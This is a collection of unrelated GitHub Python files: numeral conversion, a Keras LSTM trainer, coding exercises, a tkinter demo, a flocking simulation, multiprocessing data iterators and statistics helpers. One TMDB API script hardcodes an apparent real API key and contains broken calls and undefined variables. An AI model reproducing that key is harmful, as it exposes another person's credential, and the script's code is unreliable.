cnnum_list.reverse()\r\n cnnum = ''.join(cnnum_list)\r\n return cnnum\r\n else:\r\n raise CNnumError(f'数字长度太长({len(num)}位)超过了12位,请输入12位以内数字')\r\n\r\ndef help():\r\n print('''主要函数:CNnum_num(chnum):将中文大小写数字转换为阿拉伯数字;\r\n num_cnnum(num,CNnumtype=False)将阿拉伯数字转换为中文数字,CNnumtype定义大小写,默认小写;\r\n split2(string,lenth)规定长度反向分割字符串,例:split2('abcdefghijk',4),返回结果:['abc','defg','hijk']''')\r\n\r\n\r\n\r\nif __name__ == '__main__':\r\n # num = 2103\r\n chnum = input('数字')\r\n # print(CNnum_num(chnum))\r\n print(num_cnnum(chnum))","repo_name":"enspidermmmm/python","sub_path":"CNnum.py","file_name":"CNnum.py","file_ext":"py","file_size_in_byte":5276,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"75"} +{"seq_id":"15029774313","text":"# -*- coding: utf-8 -*-\n#注意:使用这个要在当前py文件下创建checkpoint文件夹,否则会报错\nfrom keras.callbacks import TensorBoard, ModelCheckpoint, EarlyStopping, CSVLogger\nfrom keras.layers import Dense, Dropout\nfrom keras.layers.recurrent import LSTM\nfrom keras.models import Sequential\nimport os\nimport time\nfrom keras.optimizers import Adam\nfrom keras import optimizers\nimport data_pre2\nimport matplotlib.pyplot as plt\n\ndef lstm(input_shape,nb_classes):\n \"\"\"Build a simple LSTM network. 
We pass the extracted features from\n our CNN to this model predomenently.\"\"\"\n # Model.\n model = Sequential()\n model.add(LSTM(1024, return_sequences=False,\n input_shape=input_shape,\n dropout=0.5))\n model.add(Dense(512, activation='relu'))\n model.add(Dropout(0.5))\n model.add(Dense(nb_classes, activation='softmax'))\n # optimizer = Adam(lr=1e-5, decay=1e-6)\n metrics = ['accuracy']\n sgd = optimizers.SGD(lr=0.01, decay=1e-6, momentum=0.9, nesterov=True)\n model.compile(loss='categorical_crossentropy', optimizer=sgd,metrics=metrics)\n return model\n\ndef train(trainRoot,testRoot,inputshape,nb_classes,saved_model=None,batch_size=32, nb_epoch=100):\n # Helper: Save the model.\n model='lstm'\n data_type='npy'\n checkpointer = ModelCheckpoint(\n filepath=os.path.join('data', 'checkpoints', model + '-' + data_type + \\\n '.{epoch:03d}-{val_loss:.3f}.hdf5'),\n verbose=1,\n save_best_only=True)\n # Helper: TensorBoard\n tb = TensorBoard(log_dir=os.path.join('data', 'logs', model))\n # Helper: Stop when we stop learning.Stop when the model loss didn't decrease\n early_stopper = EarlyStopping(patience=5)\n # Helper: Save results.\n timestamp = time.time()\n csv_logger = CSVLogger(os.path.join('data', 'logs', model + '-' + 'training-' + \\\n str(timestamp) + '.log'))\n # Get the data and process it.\n # Get samples per epoch.\n # Multiply by 0.7 to attempt to guess how much of data.data is the train set.\n _,size=data_pre2.get_files(trainRoot)\n steps_per_epoch = (size* 0.7) // batch_size\n\n # Get generators.\n generator = data_pre2.read_batchNPY(batch_size, trainRoot)\n val_generator = data_pre2.read_batchNPY(batch_size, testRoot)\n\n # Get the model.\n rm = lstm(inputshape, nb_classes)\n\n # Fit!\n # Use fit generator.\n history=rm.model.fit_generator(\n generator=generator,\n steps_per_epoch=steps_per_epoch,\n epochs=nb_epoch,\n verbose=1,\n callbacks=[tb, early_stopper, csv_logger, checkpointer],\n validation_data=val_generator,\n validation_steps=40,\n workers=4)#表示使用线程数\n # #HDF5和其Python库h5py\n # #model.save_weights('my_model_weights.h5')\n # #如果你需要在代码中初始化一个完全相同的模型,请使用:\n # model.load_weights('my_model_weights.h5')\n # #如果你需要加载权重到不同的网络结构(有些层一样)中,例如fine - tune或transfer - learning,你可以通过层名字来加载模型:\n # model.load_weights('my_model_weights.h5', by_name=True)\n # #list all data in history\n train_loss = history.history['loss']\n val_loss = history.history['val_loss']\n train_acc = history.history['acc']\n val_acc = history.history['val_acc']\n x = range(nb_epoch)\n\n plt.figure(1, figsize=(10, 10))\n plt.plot(x, train_loss)\n plt.plot(x, val_loss)\n plt.plot(x, train_acc)\n plt.plot(x, val_acc)\n\n plt.xlabel('Epochs')\n plt.ylabel('loss and accuracy')\n plt.title('train and val')\n plt.grid(True)\n plt.legend(['train_loss', 'val_loss', 'train_acc', 'val_acc'])\n plt.style.use(['classic'])\n plt.savefig(\"lstm_keras.png\")\n\n\ndef main():\n trainRoot = '/home/a504/PycharmProjects/caffe+lstm/data/train/'\n testRoot = '/home/a504/PycharmProjects/caffe+lstm/data/test/'\n inputshape=(100,1000)\n #这个要与datapre2里面onehot函数的类别相对应\n nb_classes=2\n batch_size=16\n saved_model=None\n nb_epoch = 2\n train(trainRoot, testRoot, inputshape, nb_classes, saved_model, batch_size, nb_epoch)\n\nif __name__ == '__main__':\n main()","repo_name":"FelicityLeung/caffe-lstm","sub_path":"lstm_keras.py","file_name":"lstm_keras.py","file_ext":"py","file_size_in_byte":4177,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"75"} +{"seq_id":"7911969903","text":"def 
arithmetic_arranger(problem_list, solution=False):\n\n # returns an error if the user inputs more than 5 problems\n if len(problem_list) > 5:\n return \"Error: Too many problems.\"\n\n # returns an error if the user inputs a non-numerical operand\n for problem in problem_list:\n problem = problem.split()\n try:\n problem[0] = int(problem[0])\n problem[2] = int(problem[2])\n except:\n return \"Error: Numbers must only contain digits.\"\n\n solution_list = []\n upper_operands = []\n lower_operands = []\n operators = []\n\n # creating 3 lists: 1 for upper operands, 1 for lower operands and 1 for operators\n for problem in problem_list:\n problem = problem.split()\n upper_operands += [problem[0]]\n operators += [problem[1]]\n lower_operands += [problem[2]]\n\n # returning error if len of operand > 4\n if len(problem[0]) > 4 or len(problem[2]) > 4:\n return \"Error: Numbers cannot be more than four digits.\"\n\n # calculating solutions to problems\n else:\n if problem[1] == \"+\":\n y = int(problem[0]) + int(problem[2])\n elif problem[1] == \"-\":\n y = int(problem[0]) - int(problem[2])\n\n # returning error if an operator is not a + or -\n else:\n return \"Error: Operator must be '+' or '-'.\"\n\n solution_list += [y]\n\n upper_str = str()\n lower_str = str()\n solution_str = str()\n dash_str = str()\n\n # creating dash string\n for z in range(0, len(problem_list)):\n dash_str = dash_str + str(\n (max(len(upper_operands[z]), len(lower_operands[z])) + 2) * \"-\" + 4 * \" \"\n )\n\n # converting dash string into dash list which will be used as a basis to format the strings of operands and solutions\n dash_list = list(dash_str.split())\n\n # creating formatted strings of upper and lower operands, as well as the solutions\n for a in range(0, len(problem_list)):\n solution_str = (\n solution_str\n + (len(dash_list[a]) - len(str(solution_list[a]))) * \" \"\n + str(solution_list[a])\n + 4 * \" \"\n )\n upper_str = (\n upper_str\n + (len(dash_list[a]) - len(upper_operands[a])) * \" \"\n + upper_operands[a]\n + 4 * \" \"\n )\n if len(upper_operands[a]) < len(lower_operands[a]):\n lower_str = lower_str + operators[a] + \" \" + lower_operands[a] + 4 * \" \"\n else:\n lower_str = (\n lower_str\n + operators[a]\n + (len(upper_operands[a]) - len(lower_operands[a]) + 1) * \" \"\n + lower_operands[a]\n + 4 * \" \"\n )\n\n # creating string of arranged problems\n if solution is True:\n arranged_problems = (\n upper_str.rstrip()\n + \"\\n\"\n + lower_str.rstrip()\n + \"\\n\"\n + dash_str.rstrip()\n + \"\\n\"\n + solution_str.rstrip()\n )\n else:\n arranged_problems = (\n upper_str.rstrip() + \"\\n\" + lower_str.rstrip() + \"\\n\" + dash_str.rstrip()\n )\n\n return arranged_problems\n\n","repo_name":"Sterari/FreeCodeCamp-Scientific-Computing-with-Python","sub_path":"Arithmetic Formatter/Arithmetic-Formatter.py","file_name":"Arithmetic-Formatter.py","file_ext":"py","file_size_in_byte":3247,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"75"} +{"seq_id":"35674631304","text":"###########Question5###########################################################\n'''\nQuestion 5\nFind the element in a singly linked list that's m elements from the end. \nFor example, if a linked list has 5 elements, the 3rd element from the end is \nthe 3rd element. The function definition should look like question5(ll, m), \nwhere ll is the first node of a linked list and m is the \"mth number \nfrom the end\". 
\n'''\n\nclass LLNode(object):\n\tdef __init__(self, data):\n\t\tself.data = data\n\t\tself.next = None\n\nclass LinkedList(object):\n\tdef __init__(self, head=None):\n\t\tself.head = head\n\n\tdef append(self, new_element):\n\t\tcurrent = self.head\n\t\tif self.head:\n\t\t\twhile current.next:\n\t\t\t\tcurrent = current.next\n\t\t\tcurrent.next = new_element\n\t\telse:\n\t\t\tself.head = new_element\n\n\tdef get_position(self, position):\n\t\t\"\"\"Get an element from a particular position.\n\t\tAssume the first position is \"1\".\n\t\tReturn \"None\" if position is not in the list.\"\"\"\n\t\tcounter = 1\n\t\tcurrent = self.head\n\t\tif position < 1:\n\t\t\treturn None\n\t\twhile current and counter <= position:\n\t\t\tif counter == position:\n\t\t\t\treturn current\n\t\t\tcurrent = current.next\n\t\t\tcounter += 1\n\t\treturn None\n\t\t\n\ndef question5(ll, m):\n\t\n\t## Get the length of linked list\n\tdef get_length(node):\n\t\t\"\"\"Get the total length of the linked list.\"\"\"\n\t\tcounter = 1\n\t\tcurrent = node\n\t\tif current:\n\t\t\twhile current:\n\t\t\t\tcurrent = current.next\n\t\t\t\tcounter += 1\n\t\t\treturn counter\n\t\telse:\n\t\t\treturn None\n\t\t\t\n\tdef get_element(l_list, position):\n\t\t\"\"\"Get an element from a particular position.\n\t\tAssume the first position is \"1\".\n\t\t\"\"\"\n\t\tcounter = 1\n\t\tcurrent = l_list\n\t\tif position < 1:\n\t\t\treturn None\n\t\twhile current and counter <= position:\n\t\t\tif counter == position:\n\t\t\t\treturn current.data\n\t\t\tcurrent = current.next\n\t\t\tcounter += 1\n\t\treturn None\n\t\n\tll_length = get_length(ll)\n\t\n\tif m < ll_length:\n\t\tm_th_from_end = ll_length - m\n\t\tm_th_element = get_element(ll, m_th_from_end)\n\t\tprint(m,'th item from the end is:', m_th_element)\n\telse:\n\t\tprint('Error: linked list is smaller than', m)\n\tprint()\n\n# Test cases\n\n# Create a linked list\nllist = LinkedList()\nfor i in range(1, 100):\n\tllist.append(LLNode(i))\n\nquestion5(llist.get_position(1), 20)\n\n\nllist = LinkedList()\nfor i in range(-4, 5):\n\tllist.append(LLNode(i))\nquestion5(llist.get_position(1), 3)\n\n\nllist = LinkedList()\nfor i in [5,3,7,8,0]:\n\tllist.append(LLNode(i))\nquestion5(llist.get_position(1), 3)\n\nllist = LinkedList()\nfor i in range(-4, 5):\n\tllist.append(LLNode(i))\nquestion5(llist.get_position(1), 20)","repo_name":"lasanthagithub/Technical_interview_questions_Python","sub_path":"Find_an_element_in_a_singly_linked_list_ready.py","file_name":"Find_an_element_in_a_singly_linked_list_ready.py","file_ext":"py","file_size_in_byte":2491,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"75"} +{"seq_id":"23358205296","text":"idademin = 101\nclass Worker(object):\n\tdef __init__(self, age):\n\t\tself.below = []\n\t\tself.above = []\n\t\tself.age = age\n\t\tself.skip = False\n\ndef troca(a,b):\n\tglobal w\n\ttmp = a.age\n\ta.age = b.age\n\tb.age = tmp\n\tan = w.index(a)\n\tbn = w.index(b)\n\tw[an] = b\n\tw[bn] = a\n\t\ndef perguntamod(a):\n\tglobal idademin\n\tfor e in a.above:\n\t\tif not e.skip:\n\t\t\tpergunta(e)\n\tif len(a.above) == 0:\n\t\tprint('*')\n\telse:\n\t\tprint(idademin)\n\t\tidademin = 101\n\tfor i in w:\n\t\ti.skip = False\ndef pergunta(a):\n\ta.skip = True\n\tglobal idademin\n\tif a.age < idademin:\n\t\tidademin = a.age\n\tfor e in a.above:\n\t\tif not e.skip:\n\t\t\tpergunta(e)\n\t\t\ndat = input().split()\nn = int(dat[0])\nm = int(dat[1])\ni = int(dat[2])\n\nages = input().split()\nw = []\nfor a in 
ages:\n\tw.append(Worker(int(a)))\nfor b in range(m):\n\ttemp = [int(x) for x in input().split()]\n\tx = temp[0] - 1\n\ty = temp[1] - 1\n\tw[x].below.append(w[y])\n\tw[y].above.append(w[x])\nfor c in range(i):\n\tacao = input().split()\n\tif acao[0] == \"T\":\n\t\ttroca(w[int(acao[1])-1],w[int(acao[2])-1])\n\telse:\n\t\tperguntamod(w[int(acao[1])-1])","repo_name":"murakn/OBI","sub_path":"2017/chefe.py","file_name":"chefe.py","file_ext":"py","file_size_in_byte":1036,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"75"} +{"seq_id":"36523802509","text":"import requests\nimport os\nfrom dotenv import find_dotenv, load_dotenv\n\n\nload_dotenv(find_dotenv())\nAPI_key = \"84e0dabf84e4d9643b17972c39e173e2\"\n\nBASE_URL = \"https://api.themoviedb.org/3/trending/all/day?api_key=<>={API_key}&callback=test\"\nAPI_KEY = os.getenv(\"TMDB_KEY\")\n\nquery_params = {\n \"q\": \"election\",\n \"api-key\": API_KEY\n}\n\nresponse = requests.get(\n BASE_URL,\n query_params=query_params\n)\n\nresponse_json = response.json()\n\ntry:\n articles = response_json[\"response\"][\"page\"][10][\"object\"][\"total_results\"]\n for movie in movies: \n print(movie)\nexcept KeyError:\n print(\"Couldn't fetch movies\")\n","repo_name":"Zeek9223/Georgia_State_University_Code","sub_path":"CSC 4350 Software Engineering-CTW/HW5/Api_.py","file_name":"Api_.py","file_ext":"py","file_size_in_byte":633,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"75"} +{"seq_id":"26377224584","text":"from tkinter import *\nfrom tkinter import ttk\nfrom tkinter import messagebox\n\ndef open_msg_box():\n messagebox.showwarning(\"Event Triggered\",\"Button Clicked\")\n\nroot=Tk()\n\nroot.geometry(\"400x400+300+300\")\nroot.resizable(width=False,height=False)\n\nframe=Frame(root)\n\nstyle=ttk.Style()\n\nstyle.configure(\"TButton\",\n foreground=\"midnight blue\",\n font=\"Times 20 bold italic\",\n padding=20)\n#Ttk widget names: TButton, TCheckButton, TCombobox,\n#TEntry, TFrame, TLabel, TLabelframe, TMenubutton,\n#TNotebook, TProgressbar, TRadiobutton, TScale,\n#TScrollbar, TSpinbox, Treeview\n\nprint(ttk.Style().theme_names())\nprint(style.lookup(\"TButton\",\"font\"))\nprint(style.lookup(\"TButton\",\"foreground\"))\nprint(style.lookup(\"TButton\",\"padding\"))\n\nttk.Style().theme_use('clam')\n\ntheButton=ttk.Button(frame,\n text=\"Important Button\",\n command=open_msg_box)\n\ntheButton['state']='disabled'\ntheButton['state']='normal'\n\ntheButton.pack()\n\nframe.pack()\n\nroot.mainloop()","repo_name":"sharmasourab93/JustPython","sub_path":"tkinter/TkInter22.py","file_name":"TkInter22.py","file_ext":"py","file_size_in_byte":1027,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"75"} +{"seq_id":"18768349762","text":"'''\r\nThese classes permit to run the iterator in a another process and pass the data via pickling (slow, works always)\r\nor shared memory (fast, works only for numeric numpy arrays of a defined and known in advance maximum size).\r\n\r\nThey can be used via multiple inheritance: the final dataset class simply inherits from both the \r\nSimpleDatasetScaffolding and MutiprocessingDatasetMixin.\r\n\r\nCreated on Aug 22, 2014\r\n\r\n@author: chorows\r\n'''\r\n\r\nimport numpy as np\r\n\r\nimport multiprocessing\r\nfrom . import shmarray\r\n\r\nfrom itertools import izip\r\nimport functools\r\n\r\nfrom .. 
import SimpleDatasetScaffolding\r\nfrom ..iterators import AbstractWrappedIterator, AbstractDataIterator\r\nfrom collections import OrderedDict\r\n\r\nclass MultiprocessingPicklingDataIterator(AbstractWrappedIterator):\r\n def __init__(self, iterator, qlen=2, **kwargs):\r\n super(MultiprocessingPicklingDataIterator, self).__init__(iterator=iterator, **kwargs)\r\n assert qlen>1\r\n self.q = multiprocessing.Queue(qlen)\r\n self.proc = multiprocessing.Process(target=MultiprocessingPicklingDataIterator.__subprocess,\r\n args=(self.iterator, self.q))\r\n self.proc.start()\r\n \r\n @staticmethod\r\n def __subprocess(iterator, q):\r\n for batch in iterator:\r\n q.put(tuple(batch))\r\n q.put(StopIteration)\r\n \r\n def next(self):\r\n if self.proc is None:\r\n raise StopIteration\r\n o = self.q.get()\r\n if o is StopIteration:\r\n #is this needed?\r\n self.proc.terminate()\r\n self.proc.join()\r\n self.proc=None\r\n raise StopIteration\r\n return self.make(o)\r\n\r\n def close(self):\r\n if self.proc:\r\n self.proc.terminate()\r\n #while self.q.get(0)\r\n # pass\r\n self.proc.join()\r\n self.proc=None\r\n \r\n def __del__(self):\r\n self.close()\r\n\r\nclass MultiprocessingSHMDataIterator(AbstractWrappedIterator):\r\n def __init__(self, iterator, qlen=2):\r\n assert qlen>1\r\n super(MultiprocessingSHMDataIterator, self).__init__(iterator=iterator)\r\n \r\n srcs = self.sources\r\n assert isinstance(srcs, OrderedDict)\r\n \r\n self.pipe, self.child_pipe = multiprocessing.Pipe()\r\n self.arrays = []\r\n for i in xrange(qlen+1):\r\n arr_tuple = tuple(shmarray.create(shape=(self.batch_size * np.prod(spc.dim), ), \r\n dtype=spc.dtype) \r\n for spc in srcs.values()\r\n ) \r\n self.arrays.append(arr_tuple)\r\n \r\n for i in xrange(qlen):\r\n self.pipe.send(i)\r\n self.last_idx = qlen\r\n self.subproc = multiprocessing.Process(target=MultiprocessingSHMDataIterator.__subprocess,\r\n args=(self.iterator, self.child_pipe, self.arrays))\r\n self.subproc.start()\r\n \r\n @staticmethod\r\n def __subprocess(iterator, pipe, arrays):\r\n for batch in iterator:\r\n arr_idx = pipe.recv()\r\n shapes = tuple(a.shape for a in batch)\r\n #print 'got batch: ', batch, ' shapes: ', shapes\r\n for da,ba in izip(arrays[arr_idx], batch):\r\n flat_ary = ba.ravel()\r\n #print 'da: ', da, 'flat ary; ', flat_ary\r\n da[:flat_ary.shape[0]] = flat_ary\r\n pipe.send((arr_idx, shapes))\r\n pipe.send(StopIteration)\r\n \r\n def next(self):\r\n if not self.subproc:\r\n raise StopIteration\r\n \r\n self.pipe.send(self.last_idx)\r\n o = self.pipe.recv()\r\n if o is StopIteration:\r\n self.subproc.join()\r\n self.subproc=None\r\n raise StopIteration\r\n arr_idx, shapes = o\r\n ret = self.make(a[:np.prod(s)].reshape(s) for a,s in izip(self.arrays[arr_idx],shapes))\r\n self.last_idx = arr_idx\r\n return ret\r\n \r\n def close(self):\r\n if self.subproc:\r\n self.subproc.terminate()\r\n #while self.q.get(0)\r\n # pass\r\n self.subproc.join()\r\n self.subproc=None\r\n \r\n def __del__(self):\r\n self.close()\r\n\r\nclass MutiprocessingDatasetMixin(object):\r\n '''\r\n A mixin that fetchets the data in another process.\r\n \r\n Parameters\r\n ----------\r\n \r\n mp_method: one of pickle, shm\r\n ''' \r\n def __init__(self, *args, **kwargs):\r\n self._mp_method = kwargs.pop('mp_method','shm')\r\n self._qlen = kwargs.pop('qlen', 2)\r\n \r\n super(MutiprocessingDatasetMixin,self).__init__(*args, **kwargs)\r\n \r\n @functools.wraps(SimpleDatasetScaffolding._get_iterator)\r\n def _get_iterator(self, mode, batch_size, desired_sources, rng):\r\n if 
rng is not None:\r\n rng = np.random.RandomState(rng.randint(-9223372036854775808, 9223372036854775807, (10,)))\r\n \r\n gi_func = getattr(self, '_get_iterator_' + self._mp_method)\r\n return gi_func(mode, batch_size, desired_sources, rng)\r\n \r\n def _get_iterator_pickle(self, mode, batch_size, desired_sources, rng): \r\n it = super(MutiprocessingDatasetMixin,self)._get_iterator(mode, batch_size, desired_sources, rng)\r\n return MultiprocessingPicklingDataIterator(it, qlen=self._qlen)\r\n\r\n def _get_iterator_shm(self, mode, batch_size, desired_sources, rng):\r\n it = super(MutiprocessingDatasetMixin,self)._get_iterator(mode, batch_size, desired_sources, rng)\r\n return MultiprocessingSHMDataIterator(it, qlen=self._qlen)\r\n","repo_name":"janchorowski/data_iterators","sub_path":"dataset/multiproc/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":5657,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"75"} +{"seq_id":"73024199923","text":"# Создайте программу для игры с конфетами человек против человека.\n# Условие задачи: На столе лежит 2021 конфета. Играют два игрока делая ход друг после друга.\n# Первый ход определяется жеребьёвкой. За один ход можно забрать не более чем 28 конфет.\n# Все конфеты оппонента достаются сделавшему последний ход. Сколько конфет нужно взять первому игроку,\n# чтобы забрать все конфеты у своего конкурента?\n\n# a) Добавьте игру против бота\n# b) Подумайте как наделить бота \"\"интеллектом\"\"\n\n# Параметры\n# Сколько конфет в куче\nheap = 2021\n\n# Сколько максимально конфет можно взять за один ход\none_turn = 28\n\n\ndef bot_turn(h,t):\n ret = 0\n if h > t:\n ret = h % (t + 1)\n if ret == 0: return 1 # нас ведут к проигышу, но мы надеемся...\n else: return ret # тут у нас выйгрышный вариант\n else: return h # берем последние конфеты\n\nprint('Игра \"Конфетный бот\"')\nprint('Правила игры:')\nprint('')\nprint(f'Играют 2 игрока. Есть куча из {heap} конфет. Нужно по-очереди брать из этой кучи')\nprint(f'конфеты от 1 до {one_turn} штук. Пропускать ход нельзя.')\nprint('Выигрывает тот, кто заберет последнюю конфету')\n\nprint('Кто будет ходить первым?')\nprint('1 - Бот, 2 - Человек')\nnum = int(input('Введите 1 или 2: '))\nwhile not (num in [1,2]):\n print('Вы ввели неправильное число.')\n num = int(input('Введите 1 или 2: '))\n\nbot_move = False\n\nif num == 1: bot_move = True\n\nbot_win = True\nwhile heap > 0:\n print('')\n print(f'Сейчас в куче {heap} конфет')\n if bot_move:\n turn = bot_turn(heap,one_turn)\n print(f'Мой ход. Я возьму {turn} штук(и).')\n else:\n print('Сколько конфет Вы берете?')\n turn = int(input(f'Возьмите от 1 до {one_turn} конфет: '))\n while not (0 < turn and turn<= one_turn):\n print('Вы ввели неправильное число.')\n turn = int(input(f'Возьмите от 1 до {one_turn} конфет: '))\n heap -= turn\n if heap < 1:\n if not bot_move: bot_win = False\n break\n bot_move = not bot_move\n\nprint('В куче больше нет конфет.')\nif bot_win: print('Я победил! Я счастлив!')\nelse: print('Я проиграл. 
Я в печали...')\n","repo_name":"Zep314/PyHW05","sub_path":"task02.py","file_name":"task02.py","file_ext":"py","file_size_in_byte":3028,"program_lang":"python","lang":"ru","doc_type":"code","stars":0,"dataset":"github-code","pt":"75"} +{"seq_id":"15204500574","text":"from enum import Enum, auto\r\nimport os\r\n\r\nimport pygame as pg\r\nfrom pygame.math import Vector2\r\nfrom vi import Agent, Simulation\r\nfrom vi.config import Config, dataclass, deserialize\r\n\r\n\r\n@deserialize\r\n@dataclass\r\nclass FlockingConfig(Config):\r\n alignment_weight: float = 0.5\r\n cohesion_weight: float = 0.5\r\n separation_weight: float = 0.5\r\n\r\n b_weight: float = 0.5\r\n b_dist: int = 20\r\n\r\n frame_count = 0\r\n\r\n delta_time: float = 3\r\n\r\n mass: int = 20\r\n\r\n\r\n def weights(self) -> tuple[float, float, float]:\r\n return (self.alignment_weight, self.cohesion_weight, self.separation_weight)\r\n\r\ndef sum_vec2(list: list[Vector2]) -> Vector2:\r\n result = Vector2(0, 0)\r\n for vec in list:\r\n result += vec\r\n return result\r\n\r\n\r\n\r\nclass Bird(Agent):\r\n config: FlockingConfig\r\n\r\n #i = 0\r\n\r\n def change_position(self):\r\n\r\n # Pac-man-style teleport to the other end of the screen when trying to escape\r\n self.there_is_no_escape()\r\n\r\n #YOUR CODE HERE -----------\r\n\r\n neighbors = list(self.in_proximity_accuracy().without_distance())\r\n\r\n neighbor_count = len(neighbors)\r\n\r\n a, c, s = self.config.weights() \r\n\r\n prng = self.shared.prng_move\r\n\r\n should_change_angle = prng.random()\r\n\r\n deg = prng.uniform(-10, 10)\r\n\r\n if neighbor_count != 0:\r\n\r\n pos_arr = [agent.pos for agent in neighbors]\r\n\r\n vec_arr = [agent.move for agent in neighbors]\r\n\r\n ave_v = sum_vec2(vec_arr) / neighbor_count\r\n\r\n alignment = (ave_v - self.move) * a\r\n\r\n seperation = Vector2(0, 0)\r\n\r\n for neighbor in neighbors:\r\n seperation += self.pos - neighbor.pos\r\n\r\n seperation = seperation / neighbor_count * s\r\n\r\n center = sum_vec2(pos_arr) / neighbor_count\r\n cohesion = ((center - self.pos) - self.move) * c\r\n\r\n v4 = Vector2(0, 0)\r\n\r\n for i in range(2):\r\n if self.pos[i] < self.config.b_dist:\r\n v4[i] += self.config.b_weight\r\n elif self.pos[i] > self.config.window.as_tuple()[i] - self.config.b_dist:\r\n v4[i] -= self.config.b_weight\r\n\r\n self.move += (alignment + seperation + cohesion + v4)\r\n self.move = self.move.normalize()\r\n\r\n if 0.7 > should_change_angle:\r\n self.move.rotate_ip(deg)\r\n\r\n self.pos += self.move\r\n\r\n #END CODE -----------------\r\n\r\n\r\nclass Selection(Enum):\r\n ALIGNMENT = auto()\r\n COHESION = auto()\r\n SEPARATION = auto()\r\n\r\nclass FlockingLive(Simulation):\r\n selection: Selection = Selection.ALIGNMENT\r\n config: FlockingConfig\r\n\r\n def handle_event(self, by: float):\r\n if self.selection == Selection.ALIGNMENT:\r\n self.config.alignment_weight += by\r\n elif self.selection == Selection.COHESION:\r\n self.config.cohesion_weight += by\r\n elif self.selection == Selection.SEPARATION:\r\n self.config.separation_weight += by\r\n\r\n def before_update(self):\r\n super().before_update()\r\n\r\n for event in pg.event.get():\r\n if event.type == pg.KEYDOWN:\r\n if event.key == pg.K_UP:\r\n self.handle_event(by=0.1)\r\n elif event.key == pg.K_DOWN:\r\n self.handle_event(by=-0.1)\r\n elif event.key == pg.K_1:\r\n self.selection = Selection.ALIGNMENT\r\n elif event.key == pg.K_2:\r\n self.selection = Selection.COHESION\r\n elif event.key == pg.K_3:\r\n self.selection = Selection.SEPARATION\r\n elif 
event.key == pg.K_q:\r\n self._running = False\r\n\r\n a, c, s = self.config.weights()\r\n self.config.frame_count += 1\r\n print(\"Frame :\", self.config.frame_count)\r\n print(f\"A: {a:.1f} - C: {c:.1f} - S: {s:.1f}\")\r\n\r\nconfig = FlockingConfig(\r\n image_rotation=True,\r\n movement_speed=1,\r\n radius=50,\r\n seed=1,\r\n visualise_chunks=True\r\n )\r\n\r\nx, y = config.window.as_tuple()\r\n\r\ndf = FlockingLive(config).batch_spawn_agents(100, Bird, images=[\"images/bird.png\"]).run().snapshots\r\n\r\nfile_name = \"data.csv\"\r\n\r\nprint(df)\r\n\r\nif not os.path.exists(file_name):\r\n with open(file_name, 'w'): pass\r\n\r\ndf.write_csv(file_name, separator=\",\")\r\n\r\nprint(\"Output: \", file_name)\r\n","repo_name":"Copy-Kat/ass0","sub_path":"flocking.py","file_name":"flocking.py","file_ext":"py","file_size_in_byte":4459,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"75"} +{"seq_id":"42041132318","text":"def confidence_interval(n, x_mean, sigma, gamma=0.95, digits=2):\n \"\"\"Calculation confidence interval\n X_mean = +/-z_crit * (sigma/n**0.5)\n\n Args:\n n (int): sample size\n x_mean (float): sample mean\n sigma (float): true standard deviation\n gamma (float, optional): reliability level. Default is 0.95\n digits (int, optional): the number of decimals to use when\n rounding the number. Default is 2\n \n Returns:\n confidence_interval (tuple): rounded confidence interval bounds\n \"\"\"\n from scipy.stats import norm\n \n alpha = 1 - gamma\n z_crit = -norm.ppf(alpha/2) \n eps = z_crit * sigma/(n ** 0.5) #error\n lower_bound = x_mean - eps # left (bottom) border\n upper_bound = x_mean + eps # right (top) border\n confidence_interval = (round(lower_bound, digits),\n round(upper_bound, digits)) \n return confidence_interval\n \n \ndef t_distribution(n, x_mean, x_std, gamma=0.95, digits=2):\n \"\"\"Calculation \"t\"-distribution\n X_mean = +/-t_crit * (x_std/n**0.5)\n\n Args:\n n (int): sample size\n x_mean (float): sample mean\n x_std (float): sample standard deviation\n gamma (float, optional): reliability level. Default is 0.95\n digits (int, optional): the number of decimals to use when\n rounding the number. Default is 2\n \n Returns:\n t_distribution (tuple): rounded \"t\"-distribution bounds\n \"\"\"\n from scipy.stats import t\n \n alpha = 1 - gamma\n k = n - 1\n t_crit = -t.ppf(alpha/2, k)\n eps = t_crit * x_std/(n ** 0.5) # error\n lower_bound = x_mean - eps # left (bottom) border\n upper_bound = x_mean + eps # right (top) border\n t_distribution = (round(lower_bound, digits),\n round(upper_bound, digits)) \n return t_distribution\n\n\ndef proportions_conf_interval(n, x_p, gamma=0.95, digits=2): \n \"\"\"Calculation confidence interval for proportions\n = +/-z_crit * (x_p(1 - xp)/n**0.5)\n\n Args:\n n (int): sample size\n x_p (float): sample proportion\n gamma (float, optional): reliability level. Default is 0.95\n digits (int, optional): the number of decimals to use when\n rounding the number. 
Default is 2\n \n Returns:\n Confidence interval for proportion, %\n \"\"\" \n from scipy.stats import norm\n \n alpha = 1 - gamma \n z_crit = -norm.ppf(alpha/2) # z критическое\n eps = z_crit * (x_p * (1 - x_p) / n) ** 0.5 # error\n lower_bound = x_p - eps # left (bottom) border\n upper_bound = x_p + eps # right (top) border\n return round(lower_bound * 100, digits), round(upper_bound * 100, digits)\n \n \ndef diff_proportions_conf_interval(n, xp, gamma=0.95, digits=2):\n \"\"\"Calculation confidence interval of proportions difference\n \n Args:\n n (list): list of sample size for A and B\n xp (list): list of sample proportion for A and B respectively\n gamma (float, optional): reliability level. Default is 0.95\n digits (int, optional): the number of decimals to use when\n rounding the number. Default is 2\n \n Returns:\n Confidence interval interval of proportions difference, %\n \"\"\" \n from scipy.stats import norm\n \n alpha = 1 - gamma \n diff = xp[1] - xp[0] # sample difference of convertions for groups A and B\n z_crit = -norm.ppf(alpha/2)\n eps = z_crit * (xp[0] * (1 - xp[0])/n[0] + xp[1] * (1 - xp[1])/n[1]) ** 0.5\n lower_bound = diff - eps # left (bottom) border\n upper_bound = diff + eps # right (top) border\n \n return round(lower_bound *100, digits), round(upper_bound 